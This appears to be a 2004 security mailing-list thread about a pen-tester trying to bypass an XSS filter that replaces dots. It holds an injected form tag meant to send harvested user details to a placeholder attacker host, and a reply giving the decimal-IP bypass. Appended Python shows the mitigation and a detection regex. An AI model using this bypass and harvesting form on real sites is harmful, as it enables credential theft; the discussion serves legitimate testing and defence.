WebApp Sec mailing list archives
RE: Fullstop Substitution in XSS
From: "Pete Foster" <petef () sec-tec co uk>
Date: Tue, 1 Jun 2004 09:02:20 +0100
Hi Calum,

You could use a pure decimal for IP address representation. Use the online tool at:

http://www.opinionatedgeek.com/DotNet/Tools/CrazyIP/Default.aspx

For example the IP address 192.168.0.1 can be represented as 3232235521. So your HTML FORM code would look like:

<form target="http://3232235521/path/to/script">

Hope this helps.

-- Pete

-----Original Message-----
From: Calum Power [mailto:enune () fribble net]
Sent: 29 May 2004 05:49
To: webappsec () securityfocus com
Subject: Fullstop Substitution in XSS

Hi all,

As a part of a recent Pen-Test, I came across an XSS vulnerability. The PHP script that has this vuln is filtering fullstops (.) and replacing them with underscores (_).

Now, I'm trying to write a Proof-of-Concept, in which a (convincing) form would be outputted that could 'harvest' user details and send them to an attacker's webserver. My problem lies in the output of the form tags. Any:

<form target="http://attacker.com/path/to/script">

is of course being filtered into:

<form target="http://attacker_com/path/to/script">

Has anyone else had a similar problem? I've tried using hex and unicode encoding, to no avail (they get decoded before the filtering, obviously).

Any help would be appreciated.

Cheers,
Calum

--
Calum Power
Cultural Jammer
Security Enthusiast
Hopeless Cynic
enune () fribble net
http://www.fribble.net

__________________________________________________________________________
The contents of this e-mail are confidential and are intended solely for the use of the person to whom they are addressed. If you are not the intended recipient of this message please notify the sender and delete it immediately; disclosure of its content to any other person is prohibited and may be unlawful. Sec-Tec does not accept any responsibility for viruses and it is your responsibility to scan the e-mail and attachments. Any liability arising from any third party acting on information contained in this e-mail is hereby excluded.
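The exchange above is really about why a character-blacklist filter (dot to underscore) is not an XSS fix: the injected <form> tag itself survives, and a host can be written without any dots. The following Python is an added example, not code from either poster; it contrasts that filter with context-aware HTML encoding, which is the actual mitigation. The host name and the echoed page fragment are constructed placeholders, and the form attribute used here is action (the thread's examples write target).

```python
import html
import ipaddress
import re

# Constructed sample input: an injected form tag as it would arrive in a
# reflected parameter. "attacker.example" is a placeholder host name.
INJECTED_DOTTED = '<form action="http://attacker.example/path/to/script">'


def ip_to_decimal(dotted: str) -> int:
    """Dotted-quad IPv4 address as the single 32-bit integer that browsers
    also accept in a URL host position (192.168.0.1 -> 3232235521)."""
    return int(ipaddress.IPv4Address(dotted))


def dot_filter(untrusted: str) -> str:
    """The filter described in the thread: every fullstop becomes an
    underscore. It touches one character and leaves the markup intact."""
    return untrusted.replace(".", "_")


def escape_for_html(untrusted: str) -> str:
    """The mitigation: encode for the HTML text context, so '<', '>', '&'
    and quotes can no longer open a tag or break out of an attribute."""
    return html.escape(untrusted, quote=True)


def render_with(filter_fn, payload: str) -> str:
    """Simulate the vulnerable page echoing a parameter into its body
    after running it through the chosen filter."""
    return "<p>Results for: " + filter_fn(payload) + "</p>"


def contains_form_tag(page_fragment: str) -> bool:
    """Detection check: does the rendered fragment still carry a live
    <form ...> element? Used here to compare the two filters."""
    return re.search(r"<form\b[^>]*>", page_fragment, re.IGNORECASE) is not None


if __name__ == "__main__":
    decimal_host = ip_to_decimal("192.168.0.1")
    injected_decimal = f'<form action="http://{decimal_host}/path/to/script">'
    for name, payload in (("dotted", INJECTED_DOTTED), ("decimal", injected_decimal)):
        weak = render_with(dot_filter, payload)
        strong = render_with(escape_for_html, payload)
        print(f"{name}: dot filter leaves form tag -> {contains_form_tag(weak)}")
        print(f"{name}: html.escape leaves form tag -> {contains_form_tag(strong)}")
```

Run it to see that the dot filter keeps the form element in both cases (only the dotted host is mangled), while escaping removes the element regardless of how the host is written.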
--------------------------------------------------------------------------
Current thread:
- Fullstop Substitution in XSS Calum Power (May 31)
- RE: Fullstop Substitution in XSS V. Poddubniy (Jun 01)
- RE: Fullstop Substitution in XSS Harry Metcalfe (Jun 01)
- RE: Fullstop Substitution in XSS Pete Foster (Jun 01)
- Re: Fullstop Substitution in XSS windo (Jun 01)
- Re: Fullstop Substitution in XSS Jonathan Stade (Jun 01)
- Re: Fullstop Substitution in XSS Liam Quinn (Jun 01)
- Re: Fullstop Substitution in XSS Joseph Birr-Pixton (Jun 01)
- <Possible follow-ups>
- RE: Fullstop Substitution in XSS Michael Silk (Jun 01)